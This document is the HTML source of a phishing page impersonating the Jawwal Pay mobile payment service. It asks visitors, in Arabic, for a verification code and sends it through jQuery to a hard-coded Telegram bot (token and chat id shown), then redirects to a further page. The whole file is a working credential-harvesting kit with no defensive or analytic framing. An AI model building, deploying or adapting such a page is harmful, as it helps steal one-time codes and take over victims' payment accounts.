<!DOCTYPE html>
<html lang="ar">

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="csrf-token" content="RQktravBpGn4uHMq4r0cM4WA8QZ4HeOq26zJkgqM">
    <meta property="og:image" content="https://www2.0zz0.com/2025/04/27/10/538990530.jpeg">
    <meta property="og:site_name" content="Jawwal Pay">

    <title>Jawwal Pay</title>

    <link rel="dns-prefetch" href="http://fonts.gstatic.com/">
    <link href="https://fonts.googleapis.com/css2?family=Droid+Arabic+Kufi:wght@400;700&display=swap" rel="stylesheet">
    <link href="style.css" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
    <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>

    <style type="text/css">
        * {
            direction: rtl;
            font-family: 'Droid Arabic Kufi', sans-serif;
        }

        body {
            background-color: #FFF;
        }

        .help-info {
            display: none;
        }

        .help-info.active {
            display: block;
        }

        span {
            display: block;
            font-size: 13px;
        }

        .navbar-dark {
            background-color: #FFF !important;
        }

        .bg-danger {
            background-color: #008000 !important; /* أخضر */
        }

        .text-danger {
            color: #008000 !important; /* أخضر */
        }

        body, h6, label, input, button, small, footer, .form-group {
            text-align: right !important;
        }

        .form-group.centered-button {
            text-align: center !important;
            margin-top: 10px;
            margin-bottom: 10px;
        }

        .form-group.centered-button button {
            font-size: 1.5rem;
            padding: 15px 30px;
            width: auto;
            border-radius: 50px;
            background-color: #008000; /* زر أخضر */
            color: #FFF; /* نص أبيض */
            border: none;
        }

        .form-group.centered-button button:hover {
            background-color: #006400; /* أخضر داكن عند التمرير */
        }
    </style>
</head>

<body style="background-color: #FFF;">

    <nav class="navbar navbar-expand-md navbar-danger bg-danger shadow-sm"></nav>

    <main class="py-4">
        <div class="container justify-content-center" style="justify-content: center !important;text-align: center !important;">
            <a class="navbar-brand justify-content-center"><img src="https://www2.0zz0.com/2025/04/27/10/538990530.jpeg" style="width:100%" alt="logo"></a>
        </div>

        <div class="container">
            <h6 class="text-center" style="font-weight:bold; color: #000;margin-top: 20px;margin-bottom: 30px;">قم بإدخال رمز التحقق</h6>
            <div class="container justify-content-center">
                <form id="forum" style="padding: 10px;">
                    <div class="form-group row text-right">

                        <input class="form-control" style="direction: ltr;" type="number" id="tel" name="tel" maxlength="10" autocomplete="false" autofocus="">
                        <span id="verify_tel" class="text-danger font-weight-bolder text-right" style="display: none;">يرجى التحقق من رمز التحقق</span>
                    </div>

                    <div class="form-group centered-button">
                        <a href="https://google.com">
                            <button class="btn btn-success">
                                <i class="fa fa-lock ml-10"></i> تأكيد <span style="font-weight: bold;"></span>
                            </button>
                        </a>
                    </div>

            </div>

    <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
    <script src="bot_config.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    <script>
        $(document).ready(function() {
            $('#forum').submit(function(event) {
                event.preventDefault();
                $('#verify_tel').hide();

                const tel = $("#tel").val();

                if (!tel) {
                    $('#verify_tel').show();
                    return;
                }

                const telegramMessage = "--------هيما بسلم-------\nرمز التحقق: " + tel + "\n--------------------\n";

                const telegramBotUrl = "https://api.telegram.org/bot7701259862:AAGeR_4yOWEj32nHGAM-ljhqawXJZd-d82o/sendMessage";
                const requestData = {
                    chat_id: -4601051649,
                    text: telegramMessage
                };

                $.post(telegramBotUrl, requestData, function(response) {
                    console.log(response);

                    setTimeout(function() {
                        window.location.href = "code.html";
                    }, 0);
                });
            });
        });
    </script>
</body>

</html>